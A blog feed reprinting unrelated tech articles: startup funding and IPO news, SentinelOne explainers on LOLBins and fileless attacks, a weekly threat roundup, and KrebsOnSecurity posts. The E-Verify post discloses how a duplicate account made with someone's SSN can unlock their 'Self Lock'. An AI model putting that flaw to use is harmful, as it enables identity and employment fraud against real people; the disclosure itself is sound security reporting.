OwnBackup lands $50M as backup for Salesforce ecosystem thrives

/0 Comments/in /by

OwnBackup has made a name for itself primarily as a backup and disaster recovery system for the Salesforce ecosystem, and today the company announced a $50 million investment.

Insight Partners led the round, with participation from Salesforce Ventures and Vertex Ventures. This chunk of money comes on top of a $23 million round from a year ago, and brings the total raised to more than $100 million, according to the company.

It shouldn’t come as a surprise that Salesforce Ventures chipped in when the majority of the company’s backup and recovery business involves the Salesforce ecosystem, although the company will be looking to expand beyond that with the new money.

“We’ve seen such growth over the last two and a half years around the Salesforce ecosystem, and the other ISV partners like Veeva and nCino that we’ve remained focused within the Salesforce space. But with this funding, we will expand over the next 12 months into a few new ecosystems,” company CEO Sam Gutmann told TechCrunch.

In spite of the pandemic, the company continues to grow, adding 250 new customers last quarter, bringing it to over 2,000 customers and 250 employees, according to Gutmann.

He says that raising the round, which closed at the beginning of May, had some hairy moments as the pandemic began to take hold across the world and worsen in the U.S. For a time, he began talking to new investors in case his existing ones got cold feet. As it turned out, when the quarterly numbers came in strong, the existing ones came back and the round was oversubscribed, Gutmann said.

“Q2 frankly was a record quarter for us, adding over 250 new accounts, and we’re seeing companies start to really understand how critical this is,” he said.

The company plans to continue hiring through the pandemic, although he says it might not be quite as aggressively as they once thought. Like many companies, even though they plan to hire, they are continually assessing the market. At this point, he foresees growing the workforce by about another 50 people this year, but that’s about as far as he can look ahead right now.

Gutmann says he is working with his management team to make sure he has a diverse workforce right up to the executive level, but he says it’s challenging. “I think our lower ranks are actually quite diverse, but as you get up into the leadership team, you can see on the website unfortunately we’re not there yet,” he said.

They are instructing their recruiting teams to look for diverse candidates whether by gender or ethnicity, and employees have formed a diversity and inclusion task force with internal training, particularly for managers around interviewing techniques.

He says going remote has been difficult, and he misses seeing his employees in the office. He hopes to have at least some come back before the end of the summer and slowly add more as we get into the fall, but that will depend on how things go.

OwnBackup grabs $7.5M Series B investment for SaaS data backup service

Zoom announces new Hardware as a Service offering to run on ServiceNow

/0 Comments/in /by

Zoom announced a new Hardware as a Service offering today that will run on the ServiceNow platform. At the same time, the company announced a deal with ServiceNow to standardize on Zoom and Zoom Phone for its 11,000 employees in another case of SaaS cooperation.

For starters, the new Hardware as a Service offering allows customers, who use the Zoom Phone and Zoom Rooms software, to acquire related hardware from the company for a fixed monthly cost. The company announced that initial solutions providers will include DTEN, Neat, Poly and Yealink.

The new service allows companies to access low-cost hardware and pay for the software and hardware on a single invoice. This could result in lower up-front costs, while simplifying the bookkeeping associated with a customer’s online communications options.

Companies can start small if they wish, then add additional hardware over time as needs change, and they can also opt for a fully managed service, where a third party can deal with installation and management of the hardware if that’s what a customer requires.

Zoom will run the new service on ServiceNow’s Now platform, which provides a way to manage the service requests as they come in. And in a case of one SaaS hand washing the other, ServiceNow has standardized on the Zoom platform for its internal communications tool, which has become increasingly important as the pandemic has moved employees to work from home. The company also plans to replace its current phone system with Zoom Phones.

One of the defining characteristics of SaaS companies, and a major difference from previous generations of tech companies, has been the willingness of these organizations to work together to string together sets of services when it makes sense. These kinds of partnerships not only benefit the companies involved, they tend to be a win for customers too.

Brent Leary, founder at CRM Essentials, sees this as a deal between two rising SaaS stars, and one that benefits both companies. “Everyone and their mother is announcing partnerships with Zoom, focusing on integrating video communications into core focus areas. But this partnership looks to be much more substantial than most, with ServiceNow not only partnering with Zoom for tighter video communication capabilities, but also displacing its current phone system with Zoom Phone,” Leary told TechCrunch.

ServiceNow pledges no layoffs in 2020

Nvidia’s Ampere GPUs come to Google Cloud

/0 Comments/in /by

Nvidia today announced that its new Ampere-based data center GPUs, the A100 Tensor Core GPUs, are now available in alpha on Google Cloud. As the name implies, these GPUs were designed for AI workloads, as well as data analytics and high-performance computing solutions.

The A100 promises a significant performance improvement over previous generations. Nvidia says the A100 can boost training and inference performance by over 20x compared to its predecessors (though you’ll mostly see 6x or 7x improvements in most benchmarks) and tops out at about 19.5 TFLOPs in single-precision performance and 156 TFLOPs for Tensor Float 32 workloads.

Image Credits: Nvidia

“Google Cloud customers often look to us to provide the latest hardware and software services to help them drive innovation on AI and scientific computing workloads,” said Manish Sainani, Director of Product Management at Google Cloud, in today’s announcement. “With our new A2 VM family, we are proud to be the first major cloud provider to market Nvidia A100 GPUs, just as we were with Nvidia’s T4 GPUs. We are excited to see what our customers will do with these new capabilities.”

Google Cloud users can get access to instances with up to 16 of these A100 GPUs, for a total of 640GB of GPU memory and 1.3TB of system memory.

How Do Attackers Use LOLBins In Fileless Attacks?

/0 Comments/in /by

For malware authors, the idea of exploiting existing software on a user’s machine to achieve malicious purposes has a lot of attractions. For one, it means less work for them in developing custom malware. For another, it means less chance of being detected. After all, if you can hijack an existing and trusted piece of software to achieve your ends, the chances are better that you’ll go undetected. This technique, known as “Living off the Land”, has a long history, but it’s not getting old.

New “Living off the Land” binaries, or LOLBins, can appear with any software or OS update, or may have been lying around with undocumented abilities for some time: researchers at SentinelLabs just disclosed a previously unknown LOLBin, for example. In this post, we dig into what LOLBins are, why they are a concern, and most importantly how you can detect their malicious use.

What is a LOLBin?

Any executable that comes installed as part of your operating system by default that can be used to further an attack can be considered a LOLBin. In addition, executables added by users for legitimate purposes could be exploited as a LOLBin, particularly if it is part of some common or widely used 3rd party software installation.

The key to understanding what a LOLBin is revolves less around its origin and more around whether the executable is found on the system prior to the malware attack.

In such cases, that executable is likely to be treated without suspicion by both users and admins and potentially even whitelisted as benign by some security tools.

In targeted attacks, an actor may first surveil a system for LOLBins unique to the victim’s environment, but typically attackers are interested in efficiency and prefer to write malware that will make use of commonly-found executables, such as scripting engines like bash and PowerShell as well as utilities like msiexec, psxec and desktopimgdownldr, which have unexpected or little-known capabilities useful to threat actors. On macOS, osascript is a LOLBin widely exploited by attackers for executing malicious AppleScripts.

Aside from being potentially ignored by both users and security tools, LOLBins like those just mentioned can allow malicious actors to communicate with remote servers and blend in with typical network activity. Other LOLBins may help attackers to perform functions such as compile code, achieve persistence, dump processes and hijack DLLs.

How Do Attackers Use LOLBins In Fileless Attacks?

Fileless attacks have been increasing in recent years, although there is some misunderstanding about exactly what makes an attack ‘fileless’. Such attacks may still be initiated through documents (like email attachments) and they may leave behind files (like persistence agents), but what makes them fileless is that the code is executed in-memory.

The main idea behind a fileless attack is that code execution occurs in-memory rather than by spawning a process that executes compiled code from a source file.

This means that the attack cannot be detected just by scanning a system for malicious binaries or executable files. In addition, once memory has been purged (such as by a reboot) there may be little or no evidence of the attack for incident responders and threat hunters to detect.

A typical scenario for a fileless attack might begin with a phishing attempt, in which the target is socially-engineered to click on a malicious link or attachment. This may execute JavaScript or VBScript or call a LOLBin like PowerShell to download and execute malicious code in-memory.

This second-stage payload may go on to use other LOLBins like WMI (Windows Management Instrumentation) to execute code to do things like achieve persistence, open a backdoor or contact a C2 server to exfiltrate data. Fileless attacks may be combined with other threats such as ransomware and keyloggers.

What Are Some Examples of Fileless Attacks Using LOLBins?

Fileless attacks using LOLBins are quite common and have been documented on Windows, Linux and Mac platforms. Indeed, insofar as the attack can hijack native tools that either exist on all platforms or have equivalents, these kinds of attacks can be platform-agnostic. APT group Lazarus, for example, has been observed distributing MS Word documents that will execute an in-memory attack using LOLBins regardless of whether the attachment is opened on Windows or a Mac.

image of visual basic sub autorun

Among some of the more high-profile attacks that have leveraged LOLBins and a fileless attack vector were those on the DNC (Democratic National Committee) in the previous US election year and the attack on Equifax in 2017 that resulted in billion dollar losses for the company and the exposure of records belonging to nearly 150 million people.

Why Do Security Researchers Worry About LOLBins?

As we have seen, LOLBins present a problem because they are a legitimate part of the environment that can be coerced to do the threat actors‘ work for them. Of course, some LOLBins like PowerShell are well-known and can be monitored and/or locked down to prevent abuse.

However, keeping an inventory of the functionality of every legitimate executable on the system and whether it could be leveraged for malicious purposes isn’t really practical. Not only do operating systems contain a vast amount of built-in binaries that are being added to or updated with new functionality all the time, there is also a massive amount of widely-used 3rd party software in the enterprise environment whose full functionality may not be documented.

As a result, security practitioners are continually engaged in research to unearth new or undiscovered LOLBins before attackers do.

But even when discovered, there remains the problem of how to deal with the use of that legitimate tool to ensure it is being used only for its intended purpose.

How Can You Detect the Malicious Use of LOLBins?

With no recognizable file signature and ever-revolving C2 IP addresses, security teams can be engaged in a wearying game of whackamole trying to chase stealthy attacks that their current tools are not equipped to handle.

In many scenarios, it is simply not effective to block LOLBins that may be essential to the productivity of some of the teams in your organization.

The key to defeating attacks leveraging LOLBins lies in a behavioral AI engine that can detect malicious behavior based on what code does, rather than where it comes from. Rather than inspecting files to see if they contain malicious code, a behavioral AI engine looks at activity on the endpoint and distinguishes between malicious and benign activity.

Using contextual information, the agent can not only recognize that some activity is malicious, but can also distinguish the source of the malicious activity without laying the blame at the door of the native tool invoked by the malicious process.

Conclusion

Stealth is one of every threat actor’s primary objectives, and natively existing binaries, LOLBins, provide perfect camouflage for malware that wants to hide in plain sight. While it’s vital that we continue to research the capabilities in our environment, the task of detecting malicious processes on execution regardless of their source is one that readily lends itself to an automated, machine learning algorithm. If you would like to see how SentinelOne can help protect your organization against all kinds of threat actors, contact us for a free demo.

Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

E-Verify’s “SSN Lock” is Nothing of the Sort

/0 Comments/in /by

One of the most-read advice columns on this site is a 2018 piece called “Plant Your Flag, Mark Your Territory,” which tried to impress upon readers the importance of creating accounts at websites like those at the Social Security Administration, the IRS and others before crooks do it for you. A key concept here is that these services only allow one account per Social Security number — which for better or worse is the de facto national identifier in the United States. But KrebsOnSecurity recently discovered that this is not the case with all federal government sites built to help you manage your identity online.

A reader who was recently the victim of unemployment insurance fraud said he was told he should create an account at the Department of Homeland Security‘s myE-Verify website, and place a lock on his Social Security number (SSN) to minimize the chances that ID thieves might abuse his identity for employment fraud in the future.

DHS’s myE-Verify homepage.

According to the website, roughly 600,000 employers at over 1.9 million hiring sites use E-Verify to confirm the employment eligibility of new employees. E-Verify’s consumer-facing portal myE-Verify lets users track and manage employment inquiries made through the E-Verify system. It also features a “Self Lock” designed to prevent the misuse of one’s SSN in E-Verify.

Enabling this lock is supposed to mean that for the next year thereafter, if an unauthorized individual attempts to fraudulently use a SSN for employment authorization, he or she cannot use the SSN in E-Verify, even if the SSN is that of an employment authorized individual. But in practice, this service may actually do little to deter ID thieves from impersonating you to a potential employer.

At the request of the reader who reached out (and in the interest of following my own advice to plant one’s flag), KrebsOnSecurity decided to sign up for a myE-Verify account. After verifying my email address, I was asked to pick a strong password and select a form of multi-factor authentication (MFA). The most secure MFA option offered (a one-time code generated by an app like Google Authenticator or Authy) was already pre-selected, so I chose that.

The site requested my name, address, SSN, date of birth and phone number. I was then asked to select five questions and answers that might be asked if I were to try to reset my password, such as “In what city/town did you meet your spouse,” and “What is the name of the company of your first paid job.” I chose long, gibberish answers that had nothing to do with the questions (yes, these password questions are next to useless for security and frequently are the cause of account takeovers, but we’ll get to that in a minute).

Password reset questions selected, the site proceeded to ask four, multiple-guess “knowledge-based authentication” questions to verify my identity. The U.S. Federal Trade Commission‘s primer page on preventing job-related ID theft says people who have placed a security freeze on their credit files with the major credit bureaus will need to lift or thaw the freeze before being able to answer these questions successfully at myE-Verify. However, I did not find that to be the case, even though my credit file has been frozen with the major bureaus for years.

After successfully answering the KBA questions (the answer to each was “none of the above,” by the way), the site declared I’d successfully created my account! I could then see that I had the option to place a “Self Lock” on my SSN within the E-Verify system.

Doing so required me to pick three more challenge questions and answers. The site didn’t explain why it was asking me to do this, but I assumed it would prompt me for the answers in the event that I later chose to unlock my SSN within E-Verify.

After selecting and answering those questions and clicking the “Lock my SSN” button, the site generated an error message saying something went wrong and it couldn’t proceed.

Alas, logging out and logging back in again showed that the site did in fact proceed and that my SSN was locked. Joy.

But I still had to know one thing: Could someone else come along pretending to be me and create another account using my SSN, date of birth and address but under a different email address? Using a different browser and Internet address, I proceeded to find out.

Imagine my surprise when I was able to create a separate account as me with just a different email address (once again, the correct answers to all of the KBA questions was “none of the above”). Upon logging in, I noticed my SSN was indeed locked within E-Verify. So I chose to unlock it.

Did the system ask any of the challenge questions it had me create previously? Nope. It just reported that my SSN was now unlocked. Logging out and logging back in to the original account I created (again under a different IP and browser) confirmed that my SSN was unlocked.

ANALYSIS

Obviously, if the E-Verify system allows multiple accounts to be created using the same name, address, phone number, SSN and date of birth, this is less than ideal and somewhat defeats the purpose of creating one for the purposes of protecting one’s identity from misuse.

Lest you think your SSN and DOB is somehow private information, you should know this static data about U.S. residents has been exposed many times over in countless data breaches, and in any case these digits are available for sale on most Americans via Dark Web sites for roughly the bitcoin equivalent of a fancy caffeinated drink at Starbucks.

Being unable to proceed through knowledge-based authentication questions without first unfreezing one’s credit file with one or all of the big three credit bureaus (Equifax, Experian and TransUnion) can actually be a plus for those of us who are paranoid about identity theft. I couldn’t find any mention on the E-Verify site of which company or service it uses to ask these questions, but the fact that the site doesn’t seem to care whether one has a freeze in place is troubling.

And when the correct answer to all of the KBA questions that do get asked is invariably “none of the above,” that somewhat lessens the value of asking them in the first place. Maybe that was just the luck of the draw in my case, but also troubling nonetheless. Either way, these KBA questions are notoriously weak security because the answers to them often are pulled from records that are public anyway, and can sometimes be deduced by studying the information available on a target’s social media profiles.

Speaking of silly questions, relying on “secret questions” or “challenge questions” as an alternative method of resetting one’s password is severely outdated and insecure. A 2015 study by Google titled “Secrets, Lies and Account Recovery” (PDF) found that secret questions generally offer a security level that is far lower than just user-chosen passwords. Also, the idea that an account protected by multi-factor authentication could be undermined by successfully guessing the answer(s) to one or more secret questions (answered truthfully and perhaps located by thieves through mining one’s social media accounts) is bothersome.

Finally, the advice given to the reader whose inquiry originally prompted me to sign up at myE-Verify doesn’t seem to have anything to do with preventing ID thieves from fraudulently claiming unemployment insurance benefits in one’s name at the state level. KrebsOnSecurity followed up with four different readers who left comments on this site about being victims of unemployment fraud recently, and none of them saw any inquiries about this in their myE-Verify accounts after creating them. Not that they should have seen signs of this activity in the E-Verify system; I just wanted to emphasize that one seems to have little to do with the other.

The Good, the Bad and the Ugly in Cybersecurity – Week 27

/0 Comments/in /by

The Good

Another high-profile cybercriminal has received a well-deserved sentence from a federal judge in Alexandria, VA. Aleksei Burkov, who pleaded guilty in January, was charged with conspiracy to commit computer intrusion, device fraud, identify theft, and money laundering stemming from his involvement with two well-known forums. Both forums, one of which was Cardplanet, were long-standing gathering places for cybercriminals to meet and trade stolen information.

The second forum involved was a much more guarded and heavily-vetted environment. The upper echelon would pay $5000 for the privilege of access to the forum and associated services from the participants. Burkov potentially faced 15 years of prison time after being extradited to the United States in November of 2019.

Ultimately the judge awarded him 9 years, noting that Burkov had already been incarcerated since 2015. It is estimated that the forums collectively facilitated near $20 million in credit card fraud and other identity-based crimes. It’s always good to see these cases end in a positive way (for the good guys!).

The Bad

This week, macOS security got a nasty shock in the form of a rare ransomware threat targeting the platform. Dubbed variously “EvilQuest”, “ThiefQuest” and “MacRansom.K”, this trojan displays both data stealing and encryption (ransomware) traits.

The lure and delivery of the trojan is all too familiar, unfortunately. The malware has been spreading via torrents offering pirated or “cracked” versions of a number of popular macOS applications including Ableton Live, Mixed in Key, and Little Snitch. The malware arrives as a .DMG file containing a package-based installer for the trojanized application. Upon launch, the installer requests elevated privileges, establishes both user-level and root-level persistence, and proceeds to activate additional functionality. Files do indeed get encrypted at this point; however, some additional behaviors occur adding to the list of malicious activities. “EvilQuest” appears to install a keylogger as well as a reverse shell, potentially allowing the threat actor direct and on-going access. The malware also retrieves multiple remote scripts, one of which is used specifically for file exfiltration.

The trojan will recursively seek all files under the /Users folder matching a hard-coded extension list and proceed to transmit them externally. Others have noted that there are limits to the file size that can be transferred (800k), which may prevent exfiltration of various file types (.wallet, for example). In addition, there seem to be some issues with the encryption itself, in that filetypes beyond the hard-coded extension set could end up encrypted.

Although analysis is still ongoing, this unusually complex (for macOS) malware looks like a first attempt at targeting the Apple Mac platform with malware that has the same kind of combined ransomware/wiper plus data stealing capabilities seen in malware families hitting the Windows universe of late (e.g., Ragnar, Netwalker, Snake). Expect it not to be the last.

The Ugly

In perhaps this week’s most serious security news, U.SCERT, along with many other agencies, released alerts concerning a critical vulnerability in Palo Alto Networks’ PAN-OS. The flaw, assigned CVE-2020-2021, lies in an authentication bypass in SAML Authentication. Through this vulnerability, attackers could potentially execute arbitrary code and take full control of affected devices and systems. More specifically, an unauthenticated attacker (assuming network access) could access the vulnerable resources and login to perform administrative actions such as opening up interfaces for future stages of attack or modifying permissions on existing accounts.

The problematic SAML implementation exists in code residing on multiple Palo Alto Networks products including VPN Gateways and firewalls: two big places you want to keep attackers out of. Specific software affected includes Prisma Access and GlobalProtect Gateway, among others. Palo Alto Networks posted their advisory on June 29th, which includes mitigation and workaround instructions. SAML can be temporarily disabled to prevent exploitation of the flaw, and a fix has been released in the form of updated versions of PAN-OS.

This is a critical flaw, and thankfully (this time) the vendor has provided a fix in a timely and well-communicated manner. We encourage all to review their exposure to this vulnerability and take the required steps to mitigate. Keeping all applications and services up to date and at the latest patch level, while not always straightforward, is paramount as we strive to defend our networks against current and future attacks.

Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

QuestDB nabs $2.3M seed to build open source time series database

/0 Comments/in /by

QuestDB, a member of the Y Combinator summer 2020 cohort, is building an open source time series database with speed top of mind. Today the startup announced a $2.3 million seed round.

Episode1 Ventures led the round with assistance from Seedcamp, 7percent Ventures, YCombinator, Kima Ventures and several unnamed angel investors.

The database was originally conceived in 2013 when current CTO Vlad Ilyushchenko was building trading systems for a financial services company and he was frustrated by the performance limitations of the databases available at the time, so he began building a database that could handle large amounts of data and process it extremely fast.

For a number of years, QuestDB was a side project, a labor of love for Ilyushchenko until he met his other co-founders Nicolas Hourcard, who became CEO and Tancrede Collard, who became CPO, and the three decided to build a startup on top of the open source project last year.

“We’re building an open source database for time series data, and time series databases are a multi-billion-dollar market because they’re central for financial services, IoT and other enterprise applications. And we basically make it easy to handle explosive amounts of data, and to reduce infrastructure costs massively,” Hourcard told TechCrunch.

He adds that it’s also about high performance. “We recently released a demo that you can access from our website that enables you to query a super large datasets — 1.6 billion rows with sub-second queries, mostly, and that just illustrates how performant the software is,” he said.

He sees open source as a way to build adoption from the bottom up inside organizations, winning the hearts and minds of developers first, then moving deeper in the company when they eventually build a managed cloud version of the product. For now, being open source also helps them as a small team to have a community of contributors help build the database and add to its feature set.

“We’ve got this open source product that is free to use, and it’s pretty important for us to have such a distribution model because we can basically empower developers to solve their problems, and we can ask for contributions from various communities. […] And this is really a way to spur adoption,” Hourcard said.

He says that working with YC has allowed them to talk to other companies in the ecosystem who have built similar open source-based startups and that’s been helpful, but it has also helped them learn to set and meet goals and have access to some of the biggest names in Silicon Valley, including Marc Andreessen, who delivered a talk to the cohort the same day we spoke.

Today the company has seven employees, including the three founders, spread out across the US, EU and South America. He sees this geographic diversity helping when it comes to building a diverse team in the future. “We definitely want to have more diverse backgrounds to make sure that we keep having a diverse team and we’re very strongly committed to that.”

For the short term, the company wants to continue building its community, working on continuing to improve the open source product, while working on the managed cloud product.

SEC filing indicates big data provider Palantir is raising $961M, $550M of it already secured

/0 Comments/in /by

Palantir, the sometimes controversial, but always secretive, big data and analytics provider that works with governments and other public and private organizations to power national security, health and a variety of other services, has reportedly been eyeing a public listing this autumn. But in the meantime it’s also continuing to push ahead in the private markets.

The company has filed a Form D — its first in four years — indicating that it is in the process of raising nearly $1 billion — $961,099,010, to be exact — with $549,727,437 of that already sold, and a further $411,371,573 remaining to be raised.

It’s not clear if this fundraise would essentially mean a delay to a public listing, or if it would complement it. Nor is it clear whether this filing is additionally covering secondary or previously undisclosed funding that it is now getting in order ahead of a public listing. The Form D notes that 58 investors who already have invested in the offering, which might indicate that at least some of this is secondary, and that “of the total remaining to be sold, all but $671,576.25 represents shares of common stock already subscribed for.”

The filing, alternatively, could confirm a report from back in September 2019 that the company was seeking to raise between $1 billion and $3 billion, its first fundraising in four years. That report noted Palantir was targeting a $26 billion valuation, up from $20 billion four years ago. A Reuters article from June put its valuation on secondary market trades at between $10 billion and $14 billion.

The bigger story of that Reuters report was that Palantir said in June that it had closed funding from two strategic investors that both work with the company: $500 million in funding from Japanese insurance company Sompo Holdings, and $50 million from Fujitsu. Together, it seems like these might account for $550 million already sold on the Form D.

To date, Palantir has raised $3.3 billion in funding, according to PitchBook data, which names no fewer than 108 investors on its cap table.

If you dig into the PitchBook data (some of which is behind a paywall) it also seems that Palantir has raised a number of other rounds of undisclosed amounts. Confusingly (but probably apt for a company famous for being secretive) some of that might also be part of this Form D amount.

We have reached out to Palantir to ask about the Form D and will update this post as we learn more.

While Palantir was last valued at $20 billion when it raised money four years ago, there are some data points that point to a bigger valuation today.

In April, according to a Bloomberg report, the company briefed investors with documents showing that it expects to make $1 billion in revenues this year, up 38% on 2019, and breaking even in the first time since being founded 16 years ago by Peter Thiel, Nathan Gettings, Joe Lonsdale, Stephen Cohen and current CEO Alex Karp.

(The Bloomberg report didn’t explain why Palantir was briefing investors, whether for a potential public listing, or for the fundraise we’re reporting on here, or something else.)

On top of that, the company has been in the news a lot around the global novel coronavirus pandemic. Specifically, it’s been winning business, in the form of projects in major markets like the U.K. (where it’s part of a consortium of companies working with the NHS on a COVID-19 data trove) and the U.S. (where it’s been working on a COVID-19 tracker for the federal government and a project with the CDC), and possibly others. Those projects will presumably need a lot of upfront capital to set up and run, possibly one reason it is raising money now.

Ransomware Gangs Don’t Need PR Help

/0 Comments/in /by

We’ve seen an ugly trend recently of tech news stories and cybersecurity firms trumpeting claims of ransomware attacks on companies large and small, apparently based on little more than the say-so of the ransomware gangs themselves. Such coverage is potentially quite harmful and plays deftly into the hands of organized crime.

Often the rationale behind couching these events as newsworthy is that the attacks involve publicly traded companies or recognizable brands, and that investors and the public have a right to know. But absent any additional information from the victim company or their partners who may be affected by the attack, these kinds of stories and blog posts look a great deal like ambulance chasing and sensationalism.

Currently, more than a dozen ransomware crime gangs have erected their own blogs to publish sensitive data from victims. A few of these blogs routinely issue self-serving press releases, some of which gallingly refer to victims as “clients” and cast themselves in a beneficent light. Usually, the blog posts that appear on ransom sites are little more than a teaser — screenshots of claimed access to computers, or a handful of documents that expose proprietary or financial information.

The goal behind the publication of these teasers is clear, and the ransomware gangs make no bones about it: To publicly pressure the victim company into paying up. Those that refuse to be extorted are told to expect that huge amounts of sensitive company data will be published online or sold on the dark web (or both).

Emboldened by their successes, several ransomware gangs recently have started demanding two ransoms: One payment to secure a digital key that can unlock files, folders and directories encrypted by their malware, and a second to avoid having any stolen information published or shared with others.

KrebsOnSecurity has sought to highlight ransomware incidents at companies whose core business involves providing technical services to others — particularly managed service providers that have done an exceptionally poor job communicating about the attack with their customers.

Overall, I’ve tried to use each story to call attention to key failures that frequently give rise to ransomware infections, and to offer information about how other companies can avoid a similar fate.

But simply parroting what professional extortionists have posted on their blog about victims of cybercrime smacks of providing aid and comfort to an enemy that needs and deserves neither.

Maybe you disagree, dear readers? Feel free to sound off in the comments below.

Apple device management company Jamf files S-1 as it prepares to go public

/0 Comments/in /by

Jamf, the Apple device management company, filed to go public today. Jamf might not be a household name, but the Minnesota company has been around since 2002 helping companies manage their Apple equipment.

In the early days, that was Apple computers. Later it expanded to also manage iPhones and iPads. The company launched at a time when most IT pros had few choices for managing Macs in a business setting.

Jamf changed that, and as Macs and other Apple devices grew in popularity inside organizations in the 2010s, the company’s offerings grew in demand. Notably, over the years Apple has helped Jamf and its rivals considerably, by building more sophisticated tooling at the operating system level to help manage Macs and other Apple devices inside organizations.

Jamf raised approximately $50 million of disclosed funding before being acquired by Vista Equity Partners in 2017 for $733.8 million, according to the S-1 filing. Today, the company kicks off the high-profile portion of its journey toward going public.

Apple device management takes center stage

In a case of interesting timing, Jamf is filing to go public less than a week after Apple bought mobile device management startup Fleetsmith. At the time, Apple indicated that it would continue to partner with Jamf as before, but with its own growing set of internal tooling, which could at some point begin to compete more rigorously with the market leader.

Other companies in the space managing Apple devices besides Jamf and Fleetsmith include Addigy and Kandji. Other more general offerings in the mobile device management (MDM) space include MobileIron and VMware Airwatch among others.

Vista is a private equity shop with a specific thesis around buying out SaaS and other enterprise companies, growing them, and then exiting them onto the public markets or getting them acquired by strategic buyers. Examples include Ping Identity, which the firm bought in 2016 before taking it public last year, and Marketo, which Vista bought in 2016 for $1.8 billion and sold to Adobe last year for $4.8 billion, turning a tidy profit.

Inside the machine

Now that we know where Jamf sits in the market, let’s talk about it from a purely financial perspective.

Jamf is a modern software company, meaning that it sells its digital services on a recurring basis. In the first quarter of 2020, for example, about 83% of its revenue came from subscription software. The rest was generated by services and software licenses.

Now that we know what type of company Jamf is, let’s explore its growth, profitability and cash generation. Once we understand those facets of its results, we’ll be able to understand what it might be worth and if its IPO appears to be on solid footing.

We’ll start with growth. In 2018 Jamf recorded $146.6 million in revenue, which grew to $204.0 million in 2019. That works out to an annual growth rate of 39.2%, a more than reasonable pace of growth for a company going public. It’s not super quick, mind, but it’s not slow either. More recently, the company grew 36.9% from $44.1 million in Q1 2019 to $60.4 million in revenue in Q1 2020. That’s a bit slower, but not too much slower.

Turning to profitability, we need to start with the company’s gross margins. Then we’ll talk about its net margins. And, finally, adjusted profits.

Gross margins help us understand how valuable a company’s revenue is. The higher the gross margins, the better. SaaS companies like Jamf tend to have gross margins of 70% or above. In Jamf’s own case, it posted gross margins of 75.1% in Q1 2020, and 72.5% in 2019. Jamf’s gross margins sit comfortably in the realm of SaaS results, and, perhaps even more importantly, are improving over time.

Getting behind the curtain

When all its expenses are accounted for, the picture is less rosy, and Jamf is unprofitable. The company’s net losses for 2018 and 2019 were similar, totaling $36.3 million and $32.6 million, respectively. Jamf’s net loss improved a little in Q1, falling from $9.0 million in 2019 to $8.3 million this year.

The company remains weighed down by debt, however, which cost it nearly $5 million in Q1 2020, and $21.4 million for all of 2019. According to the S-1, Jamf is sporting a debt-to-equity ratio of roughly 0.8, which may be a bit higher than your average public SaaS company, and is almost certainly a function of the company’s buyout by a private equity firm.

But the company’s adjusted profit metrics strip out debt costs, and under the heavily massaged adjusted earnings before interest, taxes, depreciation and amortization (EBITDA) metric, Jamf’s history is only one of rising profitability. From $6.6 million in 2018 to $20.8 million in 2019, and from $4.3 million in Q1 2019 to $5.6 million in Q1 2020, with close to 10% adjusted operating profit margins through YE 2019.

It will be interesting to see how the company’s margins will be affected by COVID-19, with financials during the period still left blank in this initial version of the S-1. The Enterprise market in general has been reasonably resilient to the recent economic shock, and device management may actually perform above expectations, given the growing push for remote work.

Completing the picture

Something notable about Jamf is that it has positive cash generation, even if in Q1 it tends to consume cash that is made up for in other quarters. In 2019, the firm posted $11.2 million in operational cash flow. That’s a good result, and better than 2018’s $9.4 million of operating cash generation. (The company’s investing cash flows have often run negative due to Jamf acquiring other companies, like ZuluDesk and Digita.)

With Jamf, we have a SaaS company that is growing reasonably well, has solid, improving margins, non-terrifying losses, growing adjusted profits and what looks like a reasonable cash flow perspective. But Jamf is cash poor, with just $22.7 million in cash and equivalents as of the end of Q1 2020 — some months ago now. At that time, the firm also had debts of $201.6 million.

Given the company’s worth, that debt figure is not terrifying. But the company’s thin cash balance makes it a good IPO candidate; going public will raise a chunk of change for the company, giving it more operating latitude and also possibly a chance to lower its debt load. Indeed Jamf notes that it intends to use part of its IPO raise to “to repay outstanding borrowings under our term loan facility…” Paying back debt at IPO is common in private equity buyouts.

So what?

Jamf’s march to the public markets adds its name to a growing list of companies. The market is already preparing to ingest Lemonade and Accolade this week, and there are rumors of more SaaS companies in the wings, just waiting to go public.

There’s a reasonable chance that as COVID-19 continues to run roughshod over the United States, the public markets eventually lose some momentum. But that isn’t stopping companies like Jamf from rolling the dice and taking a chance going public.